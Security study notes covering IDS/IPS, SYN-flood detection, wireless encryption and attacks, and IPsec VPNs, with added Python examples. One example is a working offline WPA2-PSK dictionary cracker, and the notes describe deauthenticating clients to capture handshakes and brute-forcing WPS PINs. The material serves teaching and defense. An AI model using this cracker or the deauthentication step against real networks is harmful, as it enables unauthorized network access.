3. Advanced Network Security

 

  • IDS (Intrusion Detection Systems) & IPS (Intrusion Prevention Systems)
    • An IDS typically only detects and notifies, though an active IDS can take steps to block an attack in progress
    • Detection is either signature-based (matches predefined attack signatures) or anomaly-based (flags behavior that departs from normal)
      • Anomaly-based detection first establishes a baseline of normal operation, then alerts when traffic or behavior deviates from it
      • Anomaly-based detection can catch zero-day attacks that have no signature yet, at the cost of more false positives
      • The baseline must be rebuilt after system or network changes, or legitimate new behavior gets flagged and the detector loses accuracy
    • HIDS – Host Based
      • Installed on individual servers or workstations
      • Monitors the traffic passing through that host’s NIC, plus local logs and activity on the host itself
      • Many now also monitor application activity on the system
      • A HIDS can identify malware that antivirus would miss, since it watches behavior rather than relying only on file signatures
        • Many organizations install both a HIDS and antivirus on every workstation
    • NIDS – Network Based
      • Sensors are installed on network devices such as routers or firewalls, or fed from a switch mirror port
      • Sensors report back to a central monitoring server with a NIDS console
      • A NIDS does not see anomalies on individual hosts unless they show up on the wire, and it cannot inspect encrypted traffic
      • Mostly analyzes larger network trends and plaintext transmissions
      • NIDS sensors can be placed at different points in the network to answer different questions: a sensor outside the firewall shows what attacks are attempted, one inside shows what got through
    • Passive IDS logs an alert and may notify personnel
    • Active IDS logs and notifies, but also changes the environment in response, e.g. by adding a firewall rule to block the source
    • An IPS is always placed in-line with traffic so it can drop malicious packets and prevent the attack from succeeding; an IDS can sit out-of-band on a tap or mirror port
    • IDS and IPS gather their data by packet sniffing
      • Wired sniffing requires a physical connection to the segment (or a tap/mirror port)
      • Wireless sniffing can intercept frames over the air
    • SYN Flood Attack
      • Example of a DoS attack
      • The attacker repeatedly sends the initial SYN of the TCP handshake but never sends the final ACK, often from spoofed source addresses
      • Each half-open session holds a slot in the server’s connection backlog; once the backlog fills, the server starts refusing legitimate connections, or may crash
      • IDS and IPS can detect these attacks, and many firewalls include a flood guard that detects the flood and closes the half-open sessions (SYN cookies are another common defense)
    • Honeypots
      • Deliberately run with weak security to offer a tantalizing target
      • Typically filled with bogus data and fake transactions, so nothing real is exposed
      • Good way to gather info on an attacker’s tools and techniques
      • Two goals: distract, and analyze
      • Honeynet
        • A group of (usually virtualized) servers that work like a live network
        • Even more tantalizing and distracting
        • Provides more time to assess the attacker
      • Don’t counterattack
        • Attackers have more time than you, and possibly more skill than you. Don’t provoke them
        • You also run the risk of attacking a fellow victim whose machine is being used as a relay, rather than the attacker himself
    • Using multiple NIPS
      • NIPS 1 sits between the internet and the local web/mail servers (the DMZ)
      • NIPS 2 sits between those servers and the internal private network
      • This means that if malware sneaks past the first wall, it can’t launch attacks directly at everything; it’s cordoned off in the DMZ
    • Advanced Persistent Threats (APTs)
    • RATs (Remote Access Tools, also called Remote Access Trojans)
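The SYN flood and flood-guard points above describe what a detector has to track: half-open sessions per source inside a time window. The following is an added example, not code from the original notes or from any firewall product. It replays a constructed packet log (one legitimate client that completes its handshake, one source that only ever sends SYNs) through a small half-open tracker; the threshold, window and log format are assumptions made for the illustration.

```python
"""Half-open TCP session tracker, in the spirit of a firewall flood guard.

Added example.  Tracks the TCP three-way handshake per flow from a
constructed packet log and flags any source address that accumulates too
many half-open sessions inside a time window.  Threshold, window and log
layout are assumptions for this illustration.
"""
from collections import defaultdict

# Constructed sample log (not a real capture):
# (timestamp, src_ip, src_port, dst_ip, dst_port, tcp_flags)
# 192.0.2.10 completes a normal handshake; 10.9.9.9 only ever sends SYNs.
SAMPLE_LOG = [
    (0.00, "192.0.2.10", 51000, "198.51.100.5", 80, "SYN"),
    (0.01, "198.51.100.5", 80, "192.0.2.10", 51000, "SYN-ACK"),
    (0.02, "192.0.2.10", 51000, "198.51.100.5", 80, "ACK"),
] + [
    (0.10 + i * 0.001, "10.9.9.9", 40000 + i, "198.51.100.5", 80, "SYN")
    for i in range(120)
] + [
    (0.10 + i * 0.001 + 0.0005, "198.51.100.5", 80, "10.9.9.9", 40000 + i, "SYN-ACK")
    for i in range(120)
]


class FloodGuard:
    def __init__(self, threshold=100, window=1.0):
        self.threshold = threshold   # half-open sessions per source before alerting
        self.window = window         # seconds a half-open entry stays counted
        self.half_open = {}          # (src, sport, dst, dport) -> time the SYN was seen
        self.alerts = []

    def _expire(self, now):
        # A flood guard tears down embryonic sessions that never complete,
        # so the backlog is freed instead of sitting there until the server gives up.
        stale = [k for k, t in self.half_open.items() if now - t > self.window]
        for k in stale:
            del self.half_open[k]

    def observe(self, ts, src, sport, dst, dport, flags):
        self._expire(ts)
        key = (src, sport, dst, dport)
        if flags == "SYN":
            self.half_open[key] = ts                  # first leg: session is now half-open
        elif flags == "ACK" and key in self.half_open:
            del self.half_open[key]                   # third leg from the client: handshake complete
        # Count embryonic sessions per source; alert once per offending source.
        count = sum(1 for (s, *_) in self.half_open if s == src)
        already = any(a["src"] == src for a in self.alerts)
        if count >= self.threshold and not already:
            self.alerts.append({"src": src, "half_open": count, "at": ts})


def run(log, threshold=100, window=1.0):
    """Replay a log in timestamp order and return the guard with its state and alerts."""
    guard = FloodGuard(threshold, window)
    for entry in sorted(log, key=lambda e: e[0]):
        guard.observe(*entry)
    return guard


if __name__ == "__main__":
    g = run(SAMPLE_LOG)
    for alert in g.alerts:
        print(f"SYN flood suspected from {alert['src']}: {alert['half_open']} half-open at t={alert['at']:.3f}s")
```

The legitimate client's flow disappears from the table as soon as its ACK arrives, so it never contributes to a count; the flooding source crosses the threshold on its hundredth SYN. A real flood guard would also apply the window to expire entries and would start dropping new SYNs from the flagged source, which is where an IPS differs from a passive IDS that only raises the alert.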

Securing WLAN

Misc Wireless Principles

  • Antennas
    • Isotropic
      • Theoretical perfect 360° spread, horizontally and vertically (a point source)
      • Most omnidirectional antennas try to approximate this
    • Dipole
      • Most common; 360° horizontal coverage, about 75° vertical
      • Looks like a normal pencil antenna
    • Yagi
      • Directional antenna: a dipole with additional reflector and director elements that focus the beam one way
    • dBi/dBd indicate the gain of the antenna based on its physical characteristics (relative to an isotropic or a dipole reference antenna, respectively)
    • dBm indicates the transmit power level of the WAP (relative to 1 mW) and can be adjusted
    • Not all WAPs are routers; some just bridge wireless clients onto the network
    • Users want good coverage, administrators want low coverage for security
    • Limiting coverage only goes so far, though: an attacker can turn a cheap antenna into a long-range directional one just by putting a can around it (a “cantenna”), so don’t rely on low transmit power as a security control
  • Security Protocols
    • WEP – obsolete and trivially broken (see WEP attacks below)
    • WPA – interim replacement for WEP, using TKIP
    • WPA2 – IEEE 802.11i
      • The Wi-Fi Alliance requires all Wi-Fi Certified devices to support WPA2
      • This includes Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), the AES-based encryption mode
      • Attacks on WPA2 exist, but in practice WPA2-PSK is cracked by capturing the handshake and guessing the passphrase offline; a random passphrase of 20 or more characters makes that infeasible
    • Authentication with Enterprise Mode
    • TKIP vs CCMP
      • Temporal Key Integrity Protocol (TKIP) was used with WPA before CCMP
      • TKIP derives a fresh per-packet key, which makes it more secure than WEP’s static key, but it is still built on RC4 and is now deprecated
      • Some WPA implementations support AES-CCMP instead of TKIP; on hardware that only supports WPA, WPA with AES is the better choice
    • 802.1X is implemented with a RADIUS or Diameter server, and can be used with WPA or WPA2 in enterprise mode
      • WPA/WPA2 in personal mode just use a pre-shared key, which authenticates the network but not the individual user; everyone shares the same secret
      • Enterprise mode authenticates users, who have individual credentials
      • RADIUS uses UDP port 1812 for authentication (1813 for accounting); older implementations used 1645/1646
    • EAP – Extensible Authentication Protocol, the framework the authentication exchange runs over. A successful EAP exchange yields the Pairwise Master Key (PMK), from which the session keys are derived
      • Used by both TKIP and AES-based CCMP
    • PEAP – Encapsulates and encrypts the EAP conversation in a TLS tunnel
      • Commonly carries MSCHAPv2 inside the tunnel
      • Requires a certificate on the server, but not on clients
    • EAP-TTLS – Allows older authentication methods such as PAP within a TLS tunnel
    • EAP-TLS – The most secure and widely used EAP method. Requires certificates on the 802.1X server and on each client
    • Lightweight EAP (LEAP) – Cisco-proprietary, based on a modified CHAP/MS-CHAP exchange. Doesn’t require digital certificates, and is less secure (the challenge/response can be cracked offline)
    • Small device security
      • WTLS – Wireless Transport Layer Security, the TLS variant used in the WAP protocol stack for constrained devices
      • ECC – Elliptic Curve Cryptography, which gives equivalent security with much smaller keys, so it suits low-power devices
    • Captive Portals
      • The web pages that intercept your first request and make you sign into the network before granting access
    • Hotspots with Isolation Mode
      • Isolation mode prevents clients from seeing or sharing data with each other across the network; it is a good way to provide internet access to untrusted users without exposing them to one another
    • MAC Filtering
      • Limit wireless access to specific MAC addresses
      • This isn’t very useful, as an attacker with a sniffer can read an allowed MAC address off the air and spoof it
    • Wireless Attacks
      • War driving – driving around with a wireless scanner to map access points
      • War biking
        • A security researcher rode around with an unsecured hotspot to collect user data. In two days, 2,900 people connected to it
        • He found most used unsecured wireless networks that he could easily impersonate
      • There’s little security gained from hiding the SSID, since anyone who cares can recover it from the air (probe and association frames carry it)
        • You can at least hide it from casual users
      • WEP/WPA attacks
        • WEP uses the RC4 stream cipher with a static key and short IVs, so keystreams repeat; collecting enough traffic recovers the key and gives full access
        • IV attacks
          • The per-packet RC4 key is the WEP key concatenated with a 24-bit IV (initialization vector), and the IV is sent in plaintext in every frame
          • The IV space is small, so IVs repeat quickly, and certain weak IVs leak key bytes
          • Packet injection (replaying frames to make the AP send more responses) can bring the time to crack down to under a minute
        • WPA/WPA2-PSK cracking
          • 1. Use a wireless sniffer to capture wireless packets
          • 2. Wait for a client to authenticate and capture the 4-way handshake (the passphrase itself is never sent; the handshake carries a MIC computed from a key derived from it)
          • 3. Run an offline brute-force or dictionary attack: derive the keys from each candidate passphrase and check which one reproduces the captured MIC, then join the network with the recovered passphrase
          • If nobody is active on the wireless network, there is no handshake to capture. But if someone is connected, the attacker can send a deauthentication frame to disconnect them and capture the handshake when they reconnect
        • WPS cracking
          • Super easy. The 8-digit PIN is verified in two halves, so it can be guessed in about ten hours; disable WPS
      • Rogue Access Points
        • A WAP placed by an attacker (or an unauthorized employee) that is meant to look friendly
      • Evil Twin
        • A rogue WAP configured to impersonate a legitimate one (same SSID), so clients connect to it instead
      • Near-Field Communication
      • Bluetooth attacks
        • Don’t leave devices in discoverable mode, and don’t accept pairing requests you didn’t initiate
        • Bluejacking – Sending unsolicited messages to a device over Bluetooth
        • Bluesnarfing – Data theft over Bluetooth
        • Bluebugging – Taking over a device through Bluetooth to log phone conversations, forward calls, send messages, etc.
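The WPA cracking steps above, the PMK produced by EAP/PSK authentication, and the “20 character key” advice under WPA2 all rest on the same key derivation, so one worked example covers them. What follows is an added example, not code from the original notes and not from any cracking tool: it implements the IEEE 802.11i derivation (PBKDF2 to PMK, PRF-512 to PTK, HMAC-SHA1 to the handshake MIC) and then uses it the way offline tools do, comparing the captured MIC against the MIC each candidate passphrase produces. The SSID, MAC addresses, nonces, EAPOL frame bytes and wordlist are constructed for the illustration; the “captured” MIC is generated in code from an assumed weak passphrase rather than taken from a real network, so the example runs offline.

```python
"""Offline WPA2-PSK passphrase recovery from a captured 4-way handshake.

Added example, not from the original notes.  The key derivation follows
IEEE 802.11i; the handshake data below is constructed, not captured.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so precomputed tables only work per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(pmk, label || 0x00 || data || i) for i = 0..3."""
    out = b""
    for i in range(4):                       # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(MACs) || max(MACs) || min(nonces) || max(nonces))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(ptk, eapol_frame):
    """WPA2/CCMP handshake MIC: HMAC-SHA1 keyed with the KCK (first 16 bytes of the PTK),
    truncated to 16 bytes, over the EAPOL-Key frame with its MIC field zeroed."""
    kck = ptk[:16]
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, captured_mic, wordlist):
    """Step 3 of the attack: the candidate that reproduces the captured MIC is the PSK."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)          # one PBKDF2 (4096 HMACs) per guess
        ptk = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk, eapol_frame), captured_mic):
            return candidate
    return None


# --- Constructed "capture": what steps 1-2 (sniff, wait for the handshake) would yield ---
SSID = "CorpGuest"                                          # assumed network name
AP_MAC = bytes.fromhex("00115566aabb")                      # assumed addresses
CLIENT_MAC = bytes.fromhex("0022aabbccdd")
ANONCE = bytes(range(32))                                   # placeholder nonces, not real randomness
SNONCE = bytes(range(32, 64))
# Stand-in for handshake message 2 with the 16-byte MIC field zeroed.  A real frame is
# longer; all that matters here is that the MIC is computed over exactly these bytes.
EAPOL_MSG2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8 + SNONCE + b"\x00" * 48
WORDLIST = ["password", "letmein", "CorpGuest2015", "Summer2016!", "correct horse battery staple"]


def build_capture(real_passphrase):
    """Simulate the legitimate client: derive the PTK from the real PSK and sign message 2."""
    pmk = pmk_from_passphrase(real_passphrase, SSID)
    ptk = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk, EAPOL_MSG2)


def demo():
    captured_mic = build_capture("Summer2016!")             # the network's weak PSK (assumed)
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_MSG2, captured_mic, WORDLIST)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

Two things fall out of the code: everything the attacker needs (SSID, both MACs, both nonces, the frame and its MIC) is in the clear on the air, and the only cost per guess is the PBKDF2 call, so the defense is entirely in the passphrase. A 20-plus character random passphrase puts the search out of reach; a dictionary word or an SSID-plus-year string does not.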

Remote Access

  • Dial-up RAS
    • Uses POTS lines, modems and PPP
    • Not secure if the lines are tapped, since PPP itself does not encrypt
  • VPN and VPN Concentrators
    • VPN concentrators, often built into VPN servers or firewalls, provide all the tools required to run the VPN, including encryption and authentication, and are sized to terminate many tunnels at once
    • VPNs let you run encrypted tunnels across public networks to logically separate and secure your traffic
    • IPsec and VPN
      • IPsec offers both Tunnel Mode and Transport Mode
      • Tunnel Mode is used for VPNs and encapsulates the entire original IP packet inside a new one
      • Transport Mode only encrypts the payload (the original IP header stays visible) and is more efficient between hosts on a private network
      • IPsec uses ESP (Encapsulating Security Payload) to encrypt data and provide confidentiality, and optionally integrity. ESP is IP protocol number 50 (AH, which provides integrity only, is protocol 51)
      • IPsec uses the IKE (Internet Key Exchange) protocol over UDP port 500 to negotiate keys
        • Between the protocol number and that port, ACL rules can allow or block IPsec precisely; a rule set has to permit both, or the tunnel never comes up
      • L2TP is a good tunneling protocol, but does not encrypt data. IPsec can work in conjunction with L2TP (L2TP/IPsec, UDP 1701 carried inside ESP) for a very good tunnel
      • IPsec and NAT issues
        • NAT rewrites addresses and ports, which breaks AH (its integrity check covers the IP header) and plain ESP (NAT cannot see ports inside the encrypted payload). NAT Traversal (NAT-T) works around this by encapsulating ESP in UDP port 4500
        • Instead of IPsec, you can use tunneling protocols that rely on SSL or TLS, which pass through NAT like any other TCP connection
        • SSTP – Secure Socket Tunneling Protocol encrypts VPN traffic over SSL/TLS using TCP port 443
          • OpenVPN and OpenConnect are similar programs that use TLS
        • PPTP – Point To Point Tunnelling Protocol
          • Uses Microsoft’s encryption (MPPE)
          • Should not be used today because of known vulnerabilities (its MS-CHAPv2 authentication can be cracked)
          • Uses TCP port 1723 for control and GRE (protocol 47) for the tunneled data
    • Site-to-Site VPN
      • Uses two VPN gateways in different locations
      • From the user’s end, it’s as if there’s a single network
      • Can be slow, since all inter-site traffic is encrypted and routed through the gateways
    • VPN over Open Wireless
      • Two easy methods to protect yourself on open wireless
      • Use HTTPS connections only
      • Use a VPN service (apps like Private Internet Access or TunnelBear) so all traffic leaves the open Wi-Fi encrypted
    • NAC – Network Access Control is essential on VPNs, because admins lack complete control over home users’ computers, so they need some way to restrict what those machines can reach
      • Health and Control
        • Systems are assigned a health status based on how current their antivirus definitions are, how patched their OS is, and whether their personal firewall is on
        • When a client connects to the VPN, an authentication or health agent queries the status of that client
        • If the client doesn’t meet the health standard, it is placed on a quarantine network that contains only the resources needed to bring it back to health (update servers, patch repositories)
        • For local clients, this may mean they have internet access but cannot communicate with other devices on the network
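The “NAT and IPsec are incompatible” point above is easier to see than to state: what breaks is the integrity check, and only when it covers bytes NAT rewrites. The following is an added example, not code from the original notes and not a wire-accurate IPsec implementation. It is a simplified model in which the IP header is a small dict, the ICV is a truncated HMAC-SHA1 in the style of HMAC-SHA1-96, and the ESP payload is left unencrypted so the integrity behaviour stands out. Keys, addresses, SPI and payload are constructed for the illustration; AH and NAT-T (UDP 4500 encapsulation) are brought in to show the contrast.

```python
"""Why NAT breaks AH but not UDP-encapsulated ESP: a simplified model.

Added example; not a real IPsec implementation.  The IP header is a dict,
the ICV is HMAC-SHA1 truncated to 96 bits, and ESP encryption is omitted.
"""
import hashlib
import hmac

KEY = b"\x11" * 20   # assumed integrity key shared by both peers


def icv(key, data):
    """HMAC-SHA1-96 style integrity check value: first 12 bytes of HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()[:12]


def _ah_covered(ip_hdr, payload):
    # AH hashes the IP header with mutable fields (TTL, checksum) zeroed,
    # but src/dst are immutable from AH's point of view and ARE covered.
    return f"{ip_hdr['src']}|{ip_hdr['dst']}|{ip_hdr['proto']}|ttl=0|".encode() + payload


def ah_protect(key, ip_hdr, payload):
    """AH (IP protocol 51): ICV over IP header fields and payload."""
    return {"ip": dict(ip_hdr), "ah_icv": icv(key, _ah_covered(ip_hdr, payload)), "payload": payload}


def ah_verify(key, pkt):
    return hmac.compare_digest(icv(key, _ah_covered(pkt["ip"], pkt["payload"])), pkt["ah_icv"])


def esp_protect(key, ip_hdr, spi, seq, payload):
    """ESP (IP protocol 50) with NAT-T: ICV over the ESP header (SPI, sequence) and payload only.
    The outer IP header is never covered, and the UDP 4500 wrapper gives a NAT device
    ports it can translate."""
    esp_hdr = spi.to_bytes(4, "big") + seq.to_bytes(4, "big")
    return {"ip": dict(ip_hdr), "udp": {"sport": 4500, "dport": 4500},
            "esp": esp_hdr + payload, "esp_icv": icv(key, esp_hdr + payload)}


def esp_verify(key, pkt):
    return hmac.compare_digest(icv(key, pkt["esp"]), pkt["esp_icv"])


def nat(pkt, public_ip, new_sport=None):
    """What a source NAT does on the way out: rewrite the source address (and the UDP
    source port when there is one) and decrement the TTL.  Nothing else is touched."""
    out = dict(pkt)
    out["ip"] = dict(pkt["ip"], src=public_ip, ttl=pkt["ip"]["ttl"] - 1)
    if "udp" in pkt and new_sport is not None:
        out["udp"] = dict(pkt["udp"], sport=new_sport)
    return out


def demo():
    """Run the same payload through AH and through NAT-T ESP, with and without NAT in the path."""
    inner = {"src": "10.0.0.5", "dst": "203.0.113.7", "proto": 51, "ttl": 64}   # constructed
    payload = b"GET /secret HTTP/1.1\r\n"                                        # constructed
    ah_pkt = ah_protect(KEY, inner, payload)
    esp_pkt = esp_protect(KEY, dict(inner, proto=17), spi=0x1234, seq=1, payload=payload)
    return {
        "ah_before_nat": ah_verify(KEY, ah_pkt),
        "ah_after_nat": ah_verify(KEY, nat(ah_pkt, "198.51.100.1")),
        "esp_before_nat": esp_verify(KEY, esp_pkt),
        "esp_after_nat": esp_verify(KEY, nat(esp_pkt, "198.51.100.1", new_sport=61000)),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'verifies' if ok else 'FAILS integrity check'}")
```

The AH packet fails after NAT purely because the source address it signed has changed; the ESP packet still verifies because its ICV never included the outer header, and the UDP wrapper is what lets a port-translating NAT forward it at all. Plain ESP without NAT-T has no ports for the NAT to translate, which is the practical reason IKE negotiates NAT-T when it detects a NAT in the path. The firewall consequence is the one noted above: permit UDP 500 and 4500 as well as protocol 50, or the tunnel never establishes.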